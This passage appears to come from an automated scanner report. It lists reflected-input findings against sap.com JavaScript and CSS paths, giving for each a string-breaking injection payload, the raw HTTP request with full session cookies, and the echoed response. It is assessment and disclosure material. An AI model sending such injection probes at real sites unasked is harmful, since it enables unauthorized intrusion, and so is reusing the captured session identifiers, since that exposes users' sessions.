Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34130
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:06 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global8adae';c4f39aa5a5b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.84. http://www.sap.com/global/js/rm_js/rm_browser.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/rm_js/rm_browser.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8e2'%3b344ff4a6aa was submitted in the REST URL parameter 1. This input was echoed as be8e2';344ff4a6aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalbe8e2'%3b344ff4a6aa/js/rm_js/rm_browser.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34205
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalbe8e2';344ff4a6aa';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.85. http://www.sap.com/global/js/rm_js/rm_dhtml.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/rm_js/rm_dhtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df80d'%3b2cc172492f6 was submitted in the REST URL parameter 1. This input was echoed as df80d';2cc172492f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globaldf80d'%3b2cc172492f6/js/rm_js/rm_dhtml.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:41 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globaldf80d';2cc172492f6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.86. http://www.sap.com/global/js/rm_js/rm_iframe.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/rm_js/rm_iframe.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a719'%3b0d2f51e5aad was submitted in the REST URL parameter 1. This input was echoed as 4a719';0d2f51e5aad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global4a719'%3b0d2f51e5aad/js/rm_js/rm_iframe.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34205
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global4a719';0d2f51e5aad';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.87. http://www.sap.com/global/js/roiengine.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/roiengine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e6d5'%3b90fcd6ea8d3 was submitted in the REST URL parameter 1. This input was echoed as 5e6d5';90fcd6ea8d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global5e6d5'%3b90fcd6ea8d3/js/roiengine.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34151
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global5e6d5';90fcd6ea8d3';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.88. http://www.sap.com/global/js/sap_flash_js.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/sap_flash_js.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7aaf'%3bbad30282377 was submitted in the REST URL parameter 1. This input was echoed as b7aaf';bad30282377 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalb7aaf'%3bbad30282377/js/sap_flash_js.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34188
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:54 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:54 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalb7aaf';bad30282377';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.89. http://www.sap.com/global/js/search.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/search.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc39'%3bd5d71600491 was submitted in the REST URL parameter 1. This input was echoed as fbc39';d5d71600491 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalfbc39'%3bd5d71600491/js/search.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34130
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:44 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalfbc39';d5d71600491';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.90. http://www.sap.com/global/js/workspace.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/js/workspace.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a0c'%3b4bbc571b8b1 was submitted in the REST URL parameter 1. This input was echoed as 81a0c';4bbc571b8b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global81a0c'%3b4bbc571b8b1/js/workspace.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34151
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:49 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:49 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global81a0c';4bbc571b8b1';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.91. http://www.sap.com/global/tracking/js/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/tracking/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87339'%3bd20b3e6e719 was submitted in the REST URL parameter 1. This input was echoed as 87339';d20b3e6e719 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global87339'%3bd20b3e6e719/tracking/js/s_code.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211061712
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000018,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjects%2fContent%2fpbPage.sap_countryselector%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211061712; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:06 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjects%2fContent%2fpbPage.sap_countryselector%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211061712; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global87339';d20b3e6e719';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.92. http://www.sap.com/global/ui/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb27d'%3b9f0814850ad was submitted in the REST URL parameter 1. This input was echoed as bb27d';9f0814850ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalbb27d'%3b9f0814850ad/ui/css/print.css HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CountryRedirectFlag=1; mbox=check#true#1321210906|session#1321210845752-117832#1321212706

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34172
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalbb27d';9f0814850ad';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.93. http://www.sap.com/global/ui/css/sapcom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/css/sapcom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43183'%3b2484e654024 was submitted in the REST URL parameter 1. This input was echoed as 43183';2484e654024 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global43183'%3b2484e654024/ui/css/sapcom.css HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34179
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global43183';2484e654024';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.94. http://www.sap.com/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/css/sapcom_countryselector.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07cd'%3bec4edde2e02 was submitted in the REST URL parameter 1. This input was echoed as b07cd';ec4edde2e02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalb07cd'%3bec4edde2e02/ui/css/sapcom_countryselector.css HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34323
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
